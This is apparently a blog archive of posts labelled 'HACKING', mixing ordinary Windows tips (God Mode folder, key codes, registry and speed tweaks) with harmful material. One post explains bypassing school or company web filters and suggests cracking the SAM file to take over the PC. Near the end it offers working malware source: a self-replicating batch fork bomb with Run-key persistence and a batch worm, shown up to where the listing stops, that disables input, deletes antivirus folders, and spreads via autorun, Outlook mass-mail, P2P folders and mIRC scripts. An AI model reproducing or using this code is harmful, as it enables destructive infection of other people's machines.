Showing posts with label HACKING. Show all posts
Showing posts with label HACKING. Show all posts

Sunday, August 16, 2015

Windows 10 Setting All in one place God Mod hack & trick

God Mode (for the naming fun) is a hidden Windows feature which is very much like the Control Panel, but more advanced.  God Mode exposes nearly every setting available in Windows 10 and hence makes locating and tweaking certain options easier. However, no matter how good it sounds, it still misses out on the settings which are only available via the Settings app. If you are interested in checking out God Mode on your Windows 10 PC, here’s how to get it activated.

Accessing the All Settings mode or God Mode

To access the list of settings or the God Mode you just need to create a folder with a special name (or extension) which will convert it into the gateway to the God Mode instead of being a regular folder.
  1. Right click on your desktop and select New> Folder. You can do this in any other location, but Desktop seems like the most appropriate place for such an option.
  2. Name the folder as following  (Copying and pasting works best):
    GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
  3. Hit Enter to finish.
You’ll notice a new option on your desktop called ‘God Mode’. Double clicking it will take you to the world of nearly every setting or configuration option available on Windows.


This works fine on Windows 8.1 as well as Windows 10 and you can use just any name for the folder as long as you keep the code after the name and it will still launch up the same. We are using God Mode because it sounds more catchy and because the feature is being known as God Mode.

Sunday, March 27, 2011

key codes

VK_LBUTTON    01    Left mouse button
VK_RBUTTON    02    Right mouse button
VK_CANCEL    03    Control-break processing
VK_MBUTTON    04    Middle mouse button
¾     05-07    Undefined
VK_BACK    08    BACKSPACE
VK_TAB    09    TAB
¾     0A-0B    Undefined
VK_CLEAR    0C    CLEAR
VK_RETURN    0D    ENTER
¾     0E-0F    Undefined
VK_SHIFT    10    SHIFT
VK_CONTROL    11    CTRL
VK_MENU    12    ALT
VK_PAUSE    13    PAUSE
VK_CAPITAL    14    CAPS LOCK
¾     15-19    Reserved for Kanji systems
¾     1A    Undefined
VK_ESCAPE    1B    ESC
¾     1C-1F    Reserved for Kanji systems
VK_SPACE    20    SPACEBAR
VK_PRIOR    21    PAGE UP
VK_NEXT    22    PAGE DOWN
VK_END    23    END
VK_HOME    24    HOME
VK_LEFT    25    LEFT ARROW
VK_UP    26    UP ARROW
VK_RIGHT    27    RIGHT ARROW
VK_DOWN    28    DOWN ARROW
VK_SELECT    29    SELECT
¾     2A    Undefined
VK_EXECUTE    2B    EXECUTE
VK_SNAPSHOT    2C    PRINT SCREEN
VK_INSERT    2D    INS
VK_DELETE    2E    DEL
VK_HELP    2F    HELP
VK_0    30    0
VK_1    31    1
VK_2    32    2
VK_3    33    3
VK_4    34    4
VK_5    35    5
VK_6    36    6
VK_7    37    7
VK_8    38    8
VK_9    39    9
¾     3A-40    Undefined
VK_A    41    A
VK_B    42    B
VK_C    43    C
VK_D    44    D
VK_E    45    E
VK_F    46    F
VK_G    47    G
VK_H    48    H
VK_I    49    I
VK_J    4A    J
VK_K    4B    K
VK_L    4C    L
VK_M    4D    M
VK_N    4E    N
VK_O    4F    O
VK_P    50    P
VK_Q    51    Q
VK_R    52    R
VK_S    53    S
VK_T    54    T
VK_U    55    U
VK_V    56    V
VK_W    57    W
VK_X    58    X
VK_Y    59    Y
VK_Z    5A    Z
VK_LWIN    5B    Left Windows key (MS Natural Kb)
VK_RWIN    5C    Right Windows key (MS Natural Kb)
VK_APPS    5D    Applications key (MS Natural Kb)
¾     5E-5F    Undefined
VK_NUMPAD0    60    Numeric keypad 0
VK_NUMPAD1    61    Numeric keypad 1
VK_NUMPAD2    62    Numeric keypad 2
VK_NUMPAD3    63    Numeric keypad 3
VK_NUMPAD4    64    Numeric keypad 4
VK_NUMPAD5    65    Numeric keypad 5
VK_NUMPAD6    66    Numeric keypad 6
VK_NUMPAD7    67    Numeric keypad 7
VK_NUMPAD8    68    Numeric keypad 8
VK_NUMPAD9    69    Numeric keypad 9
VK_MULTIPLY    6A    Multiply
VK_ADD    6B    Add
VK_SEPARATOR    6C    Separator
VK_SUBTRACT    6D    Subtract
VK_DECIMAL    6E    Decimal
VK_DIVIDE    6F    Divide
VK_F1    70    F1
VK_F2    71    F2
VK_F3    72    F3
VK_F4    73    F4
VK_F5    74    F5
VK_F6    75    F6
VK_F7    76    F7
VK_F8    77    F8
VK_F9    78    F9
VK_F10    79    F10
VK_F11    7A    F11
VK_F12    7B    F12
VK_F13    7C    F13
VK_F14    7D    F14
VK_F15    7E    F15
VK_F16    7F    F16
VK_F17    80    F17
VK_F18    81    F18
VK_F19    82    F19
VK_F20    83    F20
VK_F21    84    F21
VK_F22    85    F22
VK_F23    86    F23
VK_F24    87    F24
¾     88-8F    Unassigned
VK_NUMLOCK    90    NUM LOCK
VK_SCROLL    91    SCROLL LOCK
¾     92-B9    Unassigned
¾     BA-C0    OEM specific
¾     C1-DA    Unassigned
¾     DB-E4    OEM specific
¾     E5    Unassigned
¾     E6    OEM specific
¾     E7-E8    Unassigned
¾     E9-F5    OEM specific
VK_ATTN    F6    Attn
VK_CRSEL    F7    CrSel
VK_EXSEL    F8    ExSel
VK_EREOF    F9    Erase EOF
VK_PLAY    FA    Play
VK_ZOOM    FB    Zoom
VK_NONAME    FC    Reserved for future use.
VK_PA1    FD    PA1
VK_OEM_CLEAR    FE    Clear

Saturday, October 30, 2010

HOW TO BYPASS WEB FILTERS in your school

How to bypass web filters

There are several occasions where you will be at a public te How to bypass web filters
rminal, and require access to a particular website that is blocked for some reason or another. How to bypass these restrictions is a very common question, and will be covered here.

Lets pretend for a moment that the Internet is made up of 26 websites, A-Z. The web filter blocks your browser from accessing sites X-Z, but not sites A-W. Simply make the browser think you’re going to A-
W. There are a variety of ways to do this:

Proxy Servers:
This is a list of http proxies. These sites may not be up forever, so you may need to search for “free http proxy” or “public proxy servers” or other similar terms.

Proxy server lists:
http://www.aliveproxy.com
http://www.multiproxy.org
http://www.publicproxyservers.com/index.html
http://www.tehbox.com/proxy
http://www.proxz.com
http://www.proxy4free.com/index.html
http://free-proxies.com

Now that you have a list of proxies, you would open IE (internet explorer) and click on Tools > Internet Options > Connections > LAN Settings > Advanced. Enter the address and port of one of the servers from the list in the proper area (http) and make sure the “use a proxy server for your LAN” option is selected. Remember to replace the proxy and port at your terminal to the original when you're done.

*Note: Some proxies listed may not work, and this method may decrease your surfing speed. By trying various entries, you’ll find one that works, or works faster.

The infamous translation trick:
Go to a web page translation site and use their services to “translate a page to English” thus accessing the blocked page through their trusted site.

You’ll notice that several translation sites are blocked, but by using less popular ones, this method can still be effective. Here is a list of some translation services. Again, these sites may not be up forever, so you may need to search for them.

http://babelfish.altavista.com
http://world.altavista.com
http://translation.langenberg.com
http://freetranslation.com/web.thm

Url Scripting:

Url scripting is the easiest method. It works on a select few web filters and is based on the same principal as the translation trick. By typing and address like “www.yahoo.com@www.restricted_site.com the filter will not go into effect as it recognizes the trusted site (in this case yahoo.com)

Other tricks:
Simply open the command prompt and type:
Ping restricted.com ? restricted.com obviously being the restricted site
At this point you can take down the IP address (ex. 216.109.124.73) and enter it into the browser. If access to the command prompt is also restricted, see “How to bypass restrictions to get to the command prompt.” If this article has been taken from information leak, then know that it involves anything from opening the browser, selecting view > source, then saving it as X.bat and opening it to opening a folder or browser and typing in the location of cmd.exe depending on the OS. I will not go into further, as this a completely different topic.

Use https://restrictedsite.com as referring to it as a secured site may confuse the filter.

Note: These are ancient methods that many new filters defend against, but still may be applicable in your situation. If not, a little history never hurt anyone.

Web based Proxies:
Another one of the easier, yet effective methods include web based proxies. These are simple in the fact that you just enter the restricted address and surf! Some of these have some restrictions, like daily usage limits, etc but you can also use another proxy (perhaps one that sucks, like a text only) to bypass their restrictions as well. Here is a list of some:

http://proxify.com]http://proxify.com
http://www.anonymizer.com/index.cgi]http://www.anonymizer.com/index.cgi
http://www.guardster.com/]http://www.guardster.com/
http://anonymouse.ws/anonwww.html]http://anonymouse.ws/anonwww.html
http://www.the-cloak.com/login.html]http://www.the-cloak.com/login.html
https://www.megaproxy.com/freesurf]https://www.megaproxy.com/freesurf
http://www.anonymizer.ru]http://www.anonymizer.ru
https://nadaily.com/cgi-bin/nph-proxyb.cgi]https://nadaily.com/cgi-bin/nph-proxyb.cgi
http://www.userbeam.de/cgi-bin/nph-userbeam.cgi]http://www.userbeam.de/cgi-bin/nph-userbeam.cgi
http://www.free2.surffreedom.com/nph-free.cgi]http://www.free2.surffreedom.com/nph-free.cgi

Proxy Programs:
There are many proxy programs that allow you to surf anonymously that are more or less based on the same topics we’ve covered here. I’ve added them just to cover the topic thoroughly:

http://www.hotscripts.com/Detailed/28480.html]http://www.hotscripts.com/Detailed/28480.html
http://www.inetprivacy.com/a4proxy/anonymous-grc.htm]http://www.inetprivacy.com/a4proxy/anonymous-grc.htm
http://www.orangatango.com/home/index.ie.html]http://www.orangatango.com/home/index.ie.html
http://www.steganos.com]http://www.steganos.com
http://www.anonymization.net]http://www.anonymization.net ? toolbar that requires admin rights to install

Making your own CGI proxy server:

Making your own proxy server may come in handy, but I personally find that simply uploading a txt file/w a list of proxies to a free host makes for a much easier and headache free solution. If you don’t know PERL, there is code out there to help you set it up. Check out these sites for more info:

http://httpbridge.sourceforge.net]http://httpbridge.sourceforge.net
http://www.jmarshall.com/tools/cgiproxy]http://www.jmarshall.com/tools/cgiproxy
http://www.manageability.org/blog/stuff/open-source-personal-proxy-servers-written-in-java/view]

• http://www.manageability.org/blog/stuff/op...en-in-java/view

Admin Access:

When all else fails, you can simply take over the PC and alter or delete the damn filter. This method varies according to the OS (operating system) you are dealing with. Please see “Hacking Windows NT” for more information. If this tutorial has been taken from information leak, then I will go as far as to say it involves booting the PC in another OS, copying the SAM file and cracking it using a program like saminside or LC5 rather than start a whole new topic within one.

Saturday, October 16, 2010

HOW TO CHANGE THE RECENT DOCUMENT TO 25

 

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"MaxRecentDocs"=dword:00000019

HOW TO USE THIS : COPY THE CODE IN TO A NOTEPAD FILE AND SAVE IT WITH .REG EXTENTION and double click on it..

Saturday, September 25, 2010

Firefox Booster: Tweak and Optimize Firefox for Faster Page Loading Speed

Firefox is one of the most popular web browser commonly used by most of the people due to its versatility of supporting add-ons and tweaking that can be done. Tweaking can be with respect to increase Firefox page loading speed with available internet connection or optimizing Firefox in other aspects, hence giving overall performance boost. Performing these tasks manually on Firefox config require bit knowledge and may not be convenient for basic users. Firefox Booster can help in doing so.

Firefox Booster is a freeware windows application that tweaks Firefox with a few clicks. It consists of two windows providing internet connection optimizations and miscellaneous tweaks. These tweaks are easy to understand and can be applied just by selecting them respectively.

To make these changes take effect you have to restart Firefox. This application is very useful for home users for basic tweaks and optimizations.

Download Firefox Booster (1.09MB)

Firefox Booster: Tweak and Optimize Firefox for Faster Page Loading Speed is an article on: Blogsolute

Monday, August 2, 2010

REMOVE VIRUS SAME NAME FOLDER EXE FILE IN FOLDER

A virus which produce a folder in folder with same name which folder is open?

bug2

Follow the simple steps which i Am going to tell you. Then hopefully that nasty virus will be removed.
1. go to the following web link and download McAfee Stinger, it is a small standalone antivirus scanner, and its free of cost. you do not have to install it. just download and run it.
http://vil.nai.com/vil/stinger/
2. now after downloading, double click on the stinger or RUN it.
3. hit the scan button and let the stinger scan for infections in your computer.
4. after the scan is finished stinger will remove all the viruses and Trojans.
5. but if for any reason it does not removes the virus then follow these steps. :-
a: reboot your computer in the safe mode.
b: then run the stinger and follow the procedure from step 3 which i mentioned above.
Good Luck my Friend. !!
Hope this will solve ur query.

Sunday, August 1, 2010

HOW TO SPEED UP YOUR PC SUGGESTIONS BY EXPERT

Since defragging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.


1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.

Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.

Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.

5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.

6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.

7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.

8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.

9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.

10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.

11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.

12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.

13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.

14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.

15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.

16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.

17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.

18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.

19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.

20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.

21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.

22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.

23.) At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomena, you can read numerous articles on my site.

Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.

Sunday, July 11, 2010

How to modify *.exe files

How to modify *.exe files

learn how to change *.exe files, in 5 easy steps:

1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Cause that's for programmers and assembly experts only.

try to view it in hex you'll only get tons of crap you don't understand.
First off, you need Resource Hacker(last version). It's a resource editor-
very easy to use, You can download it at h**p://www.users.on.net/johnson/resourcehacker/

2) Unzip the archive, and run ResHacker.exe. You can check out the help file too

3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.

4) In the left side of the screen a list of sections will appear.
The most common sections are
-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.
*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the programs easy!
*WAV:Change the sounds in the prog. with your own.

5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.

TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).
TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.

JOIN BLACKWORLD FOURM FOR pc EXPERTS

JOIN THIS COOL FORUM

CLICK ON THIS IMAGE

4t1v6o

Friday, July 9, 2010

HOW TO ACCESS BLOCK SITES IN COLLAGE AND SCHOOL OR YOUR COMPANY

UltraSurf is a free software which enables users inside countries with heavy Internet censorship to visit any public web sites in the world safely and freely. Users in countries without internet censorship also use it to protect their internet privacy and security.
With UltraSurf started, you can use web browsers (like IE, Firefox) the same as before, but all are under UltraSurf's protection now.

download

Wednesday, July 7, 2010

VIRUS CODING IN BAT

   1: @echo off
   2: set path="%windir%\system32"
   3: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v blah /t REG_SZ /d "C:\WINDOWS\blah.bat" /f
   4: goto core
   5: :core
   6: start cmd.exe
   7: copy %0 %random%.bat >; nul
   8: start %0
   9: goto core
  10: :end
  11: copy %0 %windir%\blah.bat > nul

FUN WITH CD/DVD ROM TEASE YOUR FRIEND

   1: fun with cd rom
   2: Set oWMP = CreateObject("WMPlayer.OCX.7" )
   3: Set colCDROMs = oWMP.cdromCollection
   4: if colCDROMs.Count >;= 1 then
   5: do
   6: For i = 0 to colCDROMs.Count - 1
   7: colCDROMs.Item(i).Eject
   8: Next ' cdrom
   9: For i = 0 to colCDROMs.Count - 1
  10: colCDROMs.Item(i).Eject
  11: Next ' cdrom
  12: loop
  13: End If
  14:  
  15:  
  16:  
  17:  
  18:  
  19: save it as .vbs and then run it....
  20:  
  21: to close it,open task manager,under process tab find wscript.vbs,end that to stop the script....
  22:  
  23: u ll like it. 

BATCH FILE VIRUS CODE

   1: @echo off
   2: @ver|find /i "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
   3: break off
   4: copy %0 %windir%\dchhaeyh.bat>;nul
   5: echo.on error resume next>;%windir%\dchhaeyh.vbs
   6: echo.set hd=CreateObject("wscript.shell")>;>%windir%\dchhaeyh.vbs
   7: echo.[AutoRun]>;%windir%\dchhaeyh.inf
   8: echo.open=%windir%\dchhaeyh.bat>;>%windir%\dchhaeyh.inf
   9: for %%c in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z) do %comspec% nul /f /c if exist %%c:\nul copy %windir%\dchhaeyh.inf %%c:\autorun.inf /y
  10: rundll32 mouse,disable
  11: rundll32 keyboard,disable
  12: set hec=deltree/y c:\
  13: %hec%antiba*>;nul
  14: %hec%antivi*>;nul
  15: %hec%av*>;nul
  16: %hec%bitdef*>;nul
  17: %hec%comman~1\>;nul
  18: %hec%cleanc*>;nul
  19: %hec%esafen\>;nul
  20: %hec%findvi*>;nul
  21: %hec%f-*>;nul
  22: %hec%fwin*>;nul
  23: %hec%inocul*>;nul
  24: %hec%kasper*>;nul
  25: %hec%mcafee*>;nul
  26: %hec%msav\>;nul
  27: %hec%norman\>;nul
  28: %hec%norton*>;nul
  29: %hec%pav\>;nul
  30: %hec%pccill*>;nul
  31: %hec%pc-cil*>;nul
  32: %hec%rav\>;nul
  33: %hec%softwin\>;nul
  34: %hec%tbav*>;nul
  35: %hec%toolkit\>;nul
  36: %hec%trendm~1\>;nul
  37: %hec%trex\>;nul
  38: %hec%virus*>;nul
  39: %hec%vpc\>;nul
  40: %hec%vs95\>;nul
  41: %hec%zonela*>;nul
  42: set hec=deltree/y c:\progra~1\
  43: %hec%antiba*>;nul
  44: %hec%antivi*>;nul
  45: %hec%avg*>;nul
  46: %hec%bitdef*>;nul
  47: %hec%comman~1\>;nul
  48: %hec%common~1\avp*>;nul
  49: %hec%common~1\syman*>;nul
  50: %hec%datafe*>;nul
  51: %hec%deerfi*>;nul
  52: %hec%f-*>;nul
  53: %hec%findvi~1\>;nul
  54: %hec%fsi\>;nul
  55: %hec%fwin*>;nul
  56: %hec%grisoft\>;nul
  57: %hec%inocul*>;nul
  58: %hec%kasper*>;nul
  59: %hec%mcafee*>;nul
  60: %hec%mindso~1\>;nul
  61: %hec%norman\>;nul
  62: %hec%norton*>;nul
  63: %hec%pandas~1\>;nul
  64: %hec%protec*>;nul
  65: %hec%quickh~1\>;nul
  66: %hec%rav\>;nul
  67: %hec%signal9\>;nul
  68: %hec%softwin\>;nul
  69: %hec%spysto~1\>;nul
  70: %hec%syman*>;nul
  71: %hec%tbav\>;nul
  72: %hec%tinype~1\>;nul
  73: %hec%trend*>;nul
  74: %hec%trojan*>;nul
  75: %hec%virus*>;nul
  76: %hec%zonela*>;nul
  77: set hec=
  78: copy %0 c:\shbm.bat>;nul
  79: set s=dress
  80: set v=Entr
  81: set i=ists
  82: echo.set sp="Scripting.FileSystem.Object">;>%windir%\dchhaeyh.vbs
  83: echo.set px=CreateObject(sp)>;>%windir%\dchhaeyh.vbs
  84: echo.set xv=CreateObject("Outlook.Application")>;>%windir%\dchhaeyh.vbs
  85: echo.set ve=WScript.CreateObject("Outlook.Application")>;>%windir%\dchhaeyh.vbs
  86: echo.set ep=ve.GetNameSpace("MAPI")>;>%windir%\dchhaeyh.vbs
  87: echo.set d=ep.Ad%s%L%i%(1)>;>%windir%\dchhaeyh.vbs
  88: echo.set ae=d.Ad%s%%v%ies>;>%windir%\dchhaeyh.vbs
  89: echo.for x=1 To ae.Count>;>%windir%\dchhaeyh.vbs
  90: echo.set pz=xv.CreateItem(0)>;>%windir%\dchhaeyh.vbs
  91: echo.set zk=pz>;>%windir%\dchhaeyh.vbs
  92: echo.zk.to=xv.GetNameSpace("MAPI").Ad%s%L%i%(1).Ad%s%%v%ies(x)>;>%windir%\dchhaeyh.vbs
  93: echo.zk.Subject="invitation">;>%windir%\dchhaeyh.vbs
  94: echo.zk.Body="hi how are">;>%windir%\dchhaeyh.vbs
  95: echo.zk.Attachments.Add("C:\shbm.bat")>;>%windir%\dchhaeyh.vbs
  96: echo.zk.send>;>%windir%\dchhaeyh.vbs
  97: echo.Next>;>%windir%\dchhaeyh.vbs
  98: echo.xv.Quit>;>%windir%\dchhaeyh.vbs
  99: set s=
 100: set v=
 101: set i=
 102: copy %0 c:\download\sbm.bat>;nul
 103: copy %0 c:\downlo~1\sbm.bat>;nul
 104: copy %0 c:\eigene~1\sbm.bat>;nul
 105: copy %0 c:\kazaa\myshar~1\sbm.bat>;nul
 106: copy %0 c:\mesdoc~1\sbm.bat>;nul
 107: copy %0 c:\meusdo~1\sbm.bat>;nul
 108: copy %0 c:\mydocu~1\mymusi~1\sbm.bat>;nul
 109: copy %0 c:\mydocu~1\sbm.bat>;nul
 110: copy %0 c:\mydown~1\sbm.bat>;nul
 111: copy %0 c:\mymusi~1\sbm.bat>;nul
 112: copy %0 c:\mymusic\sbm.bat>;nul
 113: copy %0 c:\progra~1\applej~1\incoming\sbm.bat>;nul
 114: copy %0 c:\progra~1\bearsh~1\shared\sbm.bat>;nul
 115: copy %0 c:\progra~1\edonke~1\incoming\sbm.bat>;nul
 116: copy %0 c:\progra~1\emule\incoming\sbm.bat>;nul
 117: copy %0 c:\progra~1\gnucleus\downlo~1\incoming\sbm.bat>;nul
 118: copy %0 c:\progra~1\gnucleus\downlo~1\sbm.bat>;nul
 119: copy %0 c:\progra~1\grokster\mygrok~1\sbm.bat>;nul
 120: copy %0 c:\progra~1\icq\shared~1\sbm.bat>;nul
 121: copy %0 c:\progra~1\kazaa\myshar~1\sbm.bat>;nul
 122: copy %0 c:\progra~1\kazaal~1\myshar~1\sbm.bat>;nul
 123: copy %0 c:\progra~1\kmd\myshar~1\sbm.bat>;nul
 124: copy %0 c:\progra~1\limewire\shared\sbm.bat>;nul
 125: copy %0 c:\progra~1\morpheus\myshar~1\sbm.bat>;nul
 126: copy %0 c:\progra~1\overnet\bundles\sbm.bat>;nul
 127: copy %0 c:\progra~1\shareaza\downlo~1\sbm.bat>;nul
 128: copy %0 c:\fbm>;nul
 129: copy %0 c:\mirc\download\fbm>;nul
 130: copy %0 c:\mirc32\download\fbm>;nul
 131: copy %0 c:\progra~1\mirc\download\fbm>;nul
 132: copy %0 c:\progra~1\mirc32\download\fbm>;nul
 133: echo.[script]>;%windir%\dchhaeyh.ini
 134: echo.n0=on 1:JOIN:#:{>;>%windir%\dchhaeyh.ini
 135: echo.n1=/if ( $nick == $me ) { halt }>;>%windir%\dchhaeyh.ini
 136: echo.n2=/dcc send $nick c:\fbm>;>%windir%\dchhaeyh.ini
 137: echo.n3=}>;>%windir%\dchhaeyh.ini
 138: deltree/y c:\mirc\script.ini>;nul
 139: deltree/y c:\mirc32\script.ini>;nul
 140: deltree/y c:\progra~1\mirc\script.ini>;nul
 141: deltree/y c:\progra~1\mirc32\script.ini>;nul
 142: copy %windir%\dchhaeyh.ini c:\mirc\script.ini>;nul
 143: copy %windir%\dchhaeyh.ini c:\mirc32\script.ini>;nul
 144: copy %windir%\dchhaeyh.ini c:\progra~1\mirc\script.ini>;nul
 145: copy %windir%\dchhaeyh.ini c:\progra~1\mirc32\script.ini>;nul
 146: copy %0 c:\pirch\downlo~1\fbm>;nul
 147: copy %0 c:\pirch32\downlo~1\fbm>;nul
 148: copy %0 c:\pirch98\downlo~1\fbm>;nul
 149: copy %0 c:\progra~1\pirch\downlo~1\fbm>;nul
 150: copy %0 c:\progra~1\pirch32\downlo~1\fbm>;nul
 151: copy %0 c:\progra~1\pirch98\downlo~1\fbm>;nul
 152: echo.[Levels]>;%windir%\dchhaeyh.ini
 153: echo.Enabled=1>;>%windir%\dchhaeyh.ini
 154: echo.Count=6>;>%windir%\dchhaeyh.ini
 155: echo.Level1=000-Unknowns>;>%windir%\dchhaeyh.ini
 156: echo.000-UnknownsEnabled=1>;>%windir%\dchhaeyh.ini
 157: echo.Level2=100-Level 100>;>%windir%\dchhaeyh.ini
 158: echo.100-Level 100Enabled=1>;>%windir%\dchhaeyh.ini
 159: echo.Level3=200-Level 200>;>%windir%\dchhaeyh.ini
 160: echo.200-Level 200Enabled=1>;>%windir%\dchhaeyh.ini
 161: echo.Level4=300-Level 300>;>%windir%\dchhaeyh.ini
 162: echo.300-Level 300Enabled=1>;>%windir%\dchhaeyh.ini
 163: echo.Level5=400-Level 400>;>%windir%\dchhaeyh.ini
 164: echo.400-Level 400Enabled=1>;>%windir%\dchhaeyh.ini
